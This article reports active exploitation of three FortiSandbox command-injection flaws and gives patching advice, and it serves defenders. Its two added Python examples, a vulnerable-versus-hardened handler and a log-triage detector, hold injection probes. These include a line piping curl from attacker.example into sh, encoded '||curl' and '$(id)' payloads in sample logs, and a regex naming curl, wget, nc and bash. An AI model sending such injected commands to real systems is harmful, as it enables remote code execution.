Here's the thing about critical vulnerabilities in production appliances: they don't care whether you tested your patching pipeline last weekend. They just sit there, waiting for someone with a script and a target list to knock.
That's exactly what's happening to Fortinet's FortiSandbox platform. Threat intelligence firm Defused confirmed on Monday that attackers are actively exploiting multiple critical flaws in the cyber threat detection system — and one of them had never been seen in the wild before.
The timing is brutal. Fortinet shipped fixes on April 14 and again on June 9, so depending on which flaw you count, administrators have had anywhere from a week to two months to close the door. But if you're running FortiSandbox and haven't upgraded yet, you're not just vulnerable. You're being hunted.
Defused's warning came through at 05:19 AM on June 16, and it wasn't subtle. The firm said it was observing exploitation of these flaws "during the past 24 hours." That's not a theoretical risk. That's someone running exploits against real deployments as we speak.
The Three Critical Flaws and How They Work
Fortinet tracked these vulnerabilities as CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089. All three are critical-severity, and all three share the same nightmare scenario: unauthenticated remote code execution through low-complexity command injection.
Let me break that down for the non-security crowd. Unauthenticated means you don't need to log in first. Remote code execution means an attacker can run whatever commands they want on your system. Low-complexity command injection means the exploit doesn't need to be clever — it just needs to work. And no user interaction? That's the part that keeps security teams up at night. No clicking a link. No opening a file. Just connect to the wrong endpoint and your sandbox is owned.
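To make "low-complexity command injection" concrete, here is an added illustration of the bug class, written for this article and not taken from FortiSandbox or from any Fortinet advisory. The handler, the `/var/samples` path and the filename parameter are invented; the real flaws' internals have not been published. The vulnerable function pastes untrusted input into a string destined for `/bin/sh`; the hardened form validates against an allow-list and builds an argv list so no shell ever parses the input.

```python
import re
import shlex

# Added illustration of the bug class the article describes. The handler, the
# parameter and the /var/samples path are invented for this example; none of
# it is FortiSandbox code, and the real flaws' details are not public.

SHELL_SEPARATORS = {";", "|", "||", "&", "&&"}
# Allow-list for a sample name: letters, digits, dot, underscore, dash only.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def build_vulnerable_command(filename: str) -> str:
    """Vulnerable pattern: untrusted input is pasted into a string that the
    appliance would hand to /bin/sh, e.g. subprocess.run(cmd, shell=True)."""
    return f"file -b /var/samples/{filename}"


def shell_tokens(command: str) -> list[str]:
    """Tokenise a command line the way a POSIX shell would, so separators
    such as ';' and '||' appear as their own tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def injected_commands(filename: str) -> list[list[str]]:
    """Return every extra command the shell would run for this filename.
    An empty list means the input stayed inside the intended argument."""
    tokens = shell_tokens(build_vulnerable_command(filename))
    commands: list[list[str]] = [[]]
    for tok in tokens:
        if tok in SHELL_SEPARATORS:
            commands.append([])
        else:
            commands[-1].append(tok)
    # The first command is the intended one; everything after a separator
    # is attacker-controlled.
    return [cmd for cmd in commands[1:] if cmd]


def hardened_argv(filename: str) -> list[str]:
    """Hardened form: validate against an allow-list, then build an argv list
    for subprocess.run(argv, shell=False). With no shell in the loop, a
    metacharacter is just a byte in a filename and cannot start a command."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected sample name: {filename!r}")
    return ["file", "-b", f"/var/samples/{filename}"]


if __name__ == "__main__":
    probes = ("sample.bin", "sample.bin; id",
              "x || curl http://attacker.example/s | sh")
    for name in probes:
        print(f"{name!r:45} injected: {injected_commands(name)}")
        try:
            print(f"{'':45} hardened: {hardened_argv(name)}")
        except ValueError as exc:
            print(f"{'':45} hardened: {exc}")
```

The point of `injected_commands` is that the attacker never needs to break anything clever: one separator character and the rest of the input is a second command run with the service's privileges. The hardened version refuses the input before it goes anywhere near a process, and even if the allow-list were too loose, `shell=False` means there is no interpreter to honour the separator.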
CVE-2026-39813 is the one that stands out. Defused explicitly noted it had "no previous recorded exploitation" before this wave. Strictly speaking that is not a zero-day, because Fortinet had already shipped a fix, but from a defender's chair it behaves like one: until Monday there was no exploitation signal to justify pulling it ahead of everything else in the queue, and now there is, with attackers already through the door on unpatched systems.
CVE-2026-39808 is the workhorse. Unlike CVE-2026-39813 it had recorded exploitation before this wave, so attackers already have working tooling for it. Expect this one to show up in the wild for months to come.
Then there's CVE-2026-25089, whose circulating exploit Defused described as "vibecoded": apparently AI-generated and, in the firm's assessment, not functional. Defused said no working public proof-of-concept has been disclosed yet. But don't get too comfortable. When three critical flaws in the same product are in play in an active campaign, a broken public exploit usually gets fixed by someone in a basement somewhere within days.
What Admins Need to Do (And Why Waiting Is a Bad Idea)
Fortinet's guidance is straightforward: upgrade to the latest released versions immediately. The patches dropped on April 14 and June 9, so if you're running anything older than those builds, you're exposed.
I know what you're thinking. Patching cycles are painful. You've got change windows, rollback plans, stakeholder sign-offs, and the eternal question of whether a reboot will break something else. But here's the reality check: these aren't theoretical vulnerabilities sitting in a CVE database collecting dust. They're being exploited right now, against real FortiSandbox deployments, by people who aren't going to wait for your next maintenance window.
The command injection flaws require no user interaction. That means your security team can't rely on user awareness training to keep you safe. You can't tell people "don't click weird links." The attack is nothing more than a request to the appliance's exposed service, and no human is in the loop. If you haven't patched, your FortiSandbox is essentially a public-facing service that runs arbitrary commands for anyone who can reach the right endpoint.
Fortinet didn't respond to BleepingComputer's request for confirmation when reached about the active exploitation reports. That silence is notable — vendors usually rush to confirm or deny when their products are in the news for being actively attacked. The lack of response doesn't change the facts, but it does suggest Fortinet is either still verifying internally or managing the situation through private channels with affected customers.
The Path Traversal Flaw That Probably Got Chained
There's another vulnerability worth talking about, even though it's medium-severity. CVE-2025-61624 is a path traversal flaw that Fortinet flagged as exploited in the wild back in April. It requires an authenticated, high-privileged user to trigger and lets that user escalate privileges further on the targeted system.
Here's why this matters: a bug that needs an authenticated, high-privileged user is not an entry point on its own, so whoever exploited it in April already had a foothold. Fortinet has not said how that foothold was obtained, but the obvious candidates are stolen credentials or code execution through one of the command injection flaws above, with the path traversal used afterwards to reach whatever the initial context could not. That chain is inference, not something either Fortinet or Defused has confirmed, but it is the pattern these two bug classes usually fall into.
This is a classic attack pattern, and it's exactly why security teams need to think in terms of chains rather than individual CVEs. A medium-severity flaw alone might not warrant an emergency patch. But in the context of an active exploitation campaign where attackers are chaining multiple vulnerabilities together, that medium-severity bug becomes the final piece of the puzzle.
If you've patched the three critical flaws but left CVE-2025-61624 unaddressed, you've closed the front door but left a window open in the back. Smart attackers will find it.
The Bigger Picture: Fortinet's Vulnerability Problem
FortiSandbox isn't an isolated case. This is part of a much larger pattern that's been building for years.
In February, Fortinet patched CVE-2026-21643 — a critical SQL injection vulnerability in the FortiClient Enterprise Management Server (EMS) platform. Defused flagged it as actively exploited just one month later. The response from CISA was swift and severe: on April 13, the agency ordered federal agencies to secure their FortiClient EMS instances within three days. Three days. That's not a recommendation. That's an emergency directive.
And then there's CVE-2026-26083, another critical RCE flaw in FortiSandbox that Fortinet addressed in a recent release. We're talking about multiple critical remote code execution vulnerabilities in the same product line, within the same year. That's not a coincidence. That's a pattern.
CISA currently tracks 26 Fortinet vulnerabilities that have been exploited in attacks in recent years. Thirteen of those were abused by ransomware groups. Let that sink in: half of the exploited Fortinet flaws have been weaponized by ransomware operators looking to get into networks and hold data hostage.
Fortinet products are everywhere. Firewalls, VPNs, sandboxing platforms, endpoint management — they're the backbone of enterprise security infrastructure. When those products have a history of being exploited, it creates a cascading risk that affects every organization relying on them. And right now, FortiSandbox is in the crosshairs.
What This Means for Your Security Posture
Let's be honest about what most organizations get wrong here. They treat vulnerability management as a checklist exercise. Scan for CVEs, prioritize by severity score, patch what fits in the window, move on.
That approach doesn't work when attackers are actively exploiting your specific product line. You can't wait for the next scan cycle. You can't wait for the next change window. When Defused says they're seeing exploitation "during the past 24 hours," that clock started ticking before you finished reading this paragraph.
Here's what I'd do if I were running security operations right now:
First, inventory every FortiSandbox deployment in your environment. Know what version you're running. If it's not on the latest patch, you have a critical issue.
Second, check your logs for signs of command injection attempts. Authentication failures won't tell you much here, because these flaws don't need a login. Look instead for requests to the appliance's web service whose parameters carry shell metacharacters (semicolons, pipes, backticks, $( ) substitutions, often URL-encoded once or twice), for unexpected child processes or outbound connections from the appliance itself, and for traffic from sources you don't recognize.
Third, assume you've already been probed. The fact that these flaws are being actively exploited means attackers are scanning for vulnerable instances right now. Even if you patch today, you need to investigate whether someone got in before you closed the door.
Fourth, don't stop at FortiSandbox. Review your entire Fortinet estate. If you're running FortiClient EMS, check that version too. The SQL injection flaw in that product has already been exploited, and CISA made it clear they expect federal agencies to have patched within days.
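The log review in the second step is the part most teams skip because it sounds open-ended. Below is an added example, written for this article rather than taken from Fortinet or Defused, of a first-pass triage over web access logs: it parses combined-format lines, percent-decodes each query parameter until it stops changing (so double encoding cannot hide a metacharacter), and flags values containing shell separators, substitution syntax or common second-stage tooling. The log lines, paths and parameter names are constructed for the illustration and are not FortiSandbox's; the `LOG_RE` pattern is an assumption about the export format and should be adjusted to the appliance's real one.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Added example: first-pass triage of web access logs for command-injection
# attempts. The lines below are constructed for this illustration, in the
# common combined-log format; the paths and parameter names are invented and
# are not FortiSandbox's. Adapt LOG_RE to the appliance's real export format.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Jun/2026:04:58:01 +0000] "POST /api/v1/scan?name=report.pdf HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [16/Jun/2026:04:58:07 +0000] "POST /api/v1/scan?name=report.pdf%3Bid HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.7 - - [16/Jun/2026:05:01:44 +0000] "GET /api/v1/status?host=127.0.0.1%7C%7Ccurl%20http%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 88 "-" "curl/8.5.0"
198.51.100.7 - - [16/Jun/2026:05:02:10 +0000] "GET /api/v1/status?host=10.0.0.1%2524%2528id%2529 HTTP/1.1" 200 88 "-" "curl/8.5.0"
192.0.2.5 - - [16/Jun/2026:05:03:00 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters and substitution syntax that have no business in a
# filename or hostname parameter, plus tools a second stage usually pulls in.
INJECTION_RE = re.compile(
    r"[;|&`\n\r]"                     # separators, pipes, backticks, newlines
    r"|\$[({]"                        # $(...) and ${...}
    r"|\b(?:curl|wget|nc|bash|busybox)\b"
)


def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly until the value stops changing, so double
    encoding (%2524 -> %24 -> $) cannot hide a metacharacter from the regex."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_target(target: str) -> list[tuple[str, str, str]]:
    """Return (param, decoded_value, matched_indicator) for every suspicious
    query parameter in a request target."""
    hits = []
    for key, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_param(raw)          # parse_qsl already decoded once
        match = INJECTION_RE.search(value)
        if match:
            hits.append((key, value, match.group(0)))
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each access-log line and report those whose parameters look like
    command injection. Lines that do not match LOG_RE are skipped; in
    production, count them so a format change cannot silently blind the check."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = scan_target(m["target"])
        if hits:
            alerts.append({
                "line": lineno,
                "src": m["ip"],
                "time": m["ts"],
                "status": m["status"],
                "path": urlsplit(m["target"]).path,
                "ua": m["ua"],
                "hits": hits,
            })
    return alerts


def suspicious_sources(alerts: list[dict]) -> list[str]:
    """Distinct source addresses behind the alerts, for a block list or for
    pivoting into firewall and proxy logs."""
    return sorted({a["src"] for a in alerts})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"line {a['line']}: {a['src']} {a['path']} status={a['status']}")
        for key, value, indicator in a["hits"]:
            print(f"    {key}={value!r}  (matched {indicator!r})")
    print("sources to investigate:", suspicious_sources(found))
```

Two details matter in practice. A 500 on the injection attempt, as on the second sample line, does not mean the attack failed; the injected command may have run before the handler choked on the mangled argument, so every hit is a lead for host-side investigation, not a pass. And a result of no hits only means nothing matched this indicator list; follow it with the process and outbound-connection review from the same step, since the web log never sees what the appliance did after the request.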
The broader lesson here is uncomfortable but necessary: vulnerability management isn't about keeping up with CVE scores. It's about understanding which of your assets are being actively targeted and treating those as emergencies, not priorities.
The Bottom Line
Fortinet FortiSandbox is under active attack. Three critical vulnerabilities — CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089 — are being exploited by threat actors who don't need authentication, don't need user interaction, and don't care about your patching schedule.
The patches have been available since April 14 and June 9. If you haven't applied them, you're not just vulnerable. You're being hunted.
This isn't the first time Fortinet products have been in the news for active exploitation, and based on CISA's tracking of 26 exploited Fortinet vulnerabilities (13 used by ransomware groups), it won't be the last. The question isn't whether Fortinet will have another critical flaw discovered next quarter. The question is whether your organization has the discipline to patch fast enough when it does.
Right now, that clock is ticking on FortiSandbox. And the attackers aren't waiting for your next maintenance window.